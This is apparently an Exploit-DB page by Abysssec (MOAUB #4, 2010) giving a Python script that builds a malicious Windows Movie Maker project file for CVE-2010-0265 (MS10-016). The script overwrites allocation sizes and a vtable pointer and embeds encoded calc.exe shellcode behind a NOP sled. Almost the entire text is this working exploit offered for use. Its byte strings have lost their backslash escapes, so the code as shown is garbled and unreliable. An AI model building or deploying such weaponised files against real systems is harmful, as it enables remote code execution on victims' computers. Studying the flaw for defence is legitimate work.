MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)
# Published : 2010-09-04
# Author : Abysssec
# Previous Title : MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit
# Next Title : MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow

'''
 __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ <  Day 4 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

  http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/
  http://www.exploit-db.com/sploits/Movie-Maker-Remote-Code-Execution-Exploit.zip

  Title               : Movie Maker Remote Code Execution  (MS10-016)
  Version             : moviemk.exe 2.1 (XP SP3)
  Analysis            : http://www.abysssec.com
  Vendor              : http://www.microsoft.com
  Impact              : Ciritical
  Contact             : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             : @abysssec
  CVE                 : CVE-2010-0265

  
'''


# Exploit for CVE-2010-0265
# Tested on Windows XP SP3( Movie Maker 2.1 )
  


import sys

def main():
   
    try:
		fdR = open('src.mswmm', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:9976]
		str2 = strTotal[9980:10104]
		str3 = strTotal[10108:16496]
		str4 = strTotal[17620:]
		
		size_first_new = "x20x00x00x00"      # size of first new()
		size_second_new = "x11x11x00x00" 	# size of second new()
		
		p2p = "x71xb5x06x77"    #   vtable fake pointer from resource section COMRes -8 to jmp EBX 
		
		# shellcode calc.exe
		shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx00xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49x49x49x48x49x49x49x49x49x49x49x49x49x51x5ax6ax44x58x50x30x41x30x41x6bx41x41x54x42x32x41x42x32x42x41x30x42x41x58x41x50x38x41x42x75x4ax49x69x6cx4bx58x51x54x65x50x57x70x45x50x4ex6bx67x35x35x6cx4ex6bx73x4cx55x55x71x68x67x71x68x6fx6cx4bx52x6fx46x78x4ex6bx51x4fx71x30x74x41x7ax4bx30x49x6cx4bx54x74x6ex6bx76x61x4ax4ex35x61x4bx70x6ax39x4cx6cx4dx54x6bx70x30x74x54x47x6ax61x6ax6ax64x4dx63x31x79x52x4ax4bx69x64x67x4bx32x74x65x74x66x64x31x65x4ax45x6cx4bx71x4fx31x34x57x71x48x6bx52x46x6ex6bx64x4cx52x6bx4ex6bx31x4fx77x6cx54x41x68x6bx4cx4bx57x6cx6cx4bx57x71x4ax4bx4ex69x41x4cx65x74x67x74x4ax63x75x61x4fx30x51x74x6cx4bx61x50x50x30x4fx75x4fx30x32x58x64x4cx4cx4bx71x50x54x4cx4cx4bx70x70x57x6cx4ex4dx6ex6bx73x58x35x58x4ax4bx36x69x6cx4bx4dx50x4cx70x67x70x75x50x37x70x4cx4bx45x38x35x6cx41x4fx57x41x68x76x53x50x30x56x6ex69x6bx48x6fx73x6fx30x63x4bx62x70x30x68x58x70x6fx7ax57x74x51x4fx45x38x6fx68x59x6ex4fx7ax66x6ex62x77x69x6fx38x67x73x53x52x41x30x6cx71x73x64x6ex35x35x30x78x70x65x45x50x44'
		
					
		if len(shellcode) > 1120:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 1120:
			dif = 1120- len(shellcode)
			while dif > 0 :
				shellcode += 'x90'
				dif = dif - 1
				
		fdW= open('exploit.mswmm', 'wb+')
		fdW.write(str1)
		fdW.write(size_first_new)
		fdW.write(str2)
		fdW.write(size_second_new)
		fdW.write(str3)
		fdW.write(p2p)
		fdW.write('x90x90x90x90x90x90x90x90x90x90x90x90')     # padding		
		fdW.write(shellcode)
		fdW.write(str4)
		
		
		fdW.close()
		fdR.close()
		print '[-] Movie Maker file(.MSWMM) generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()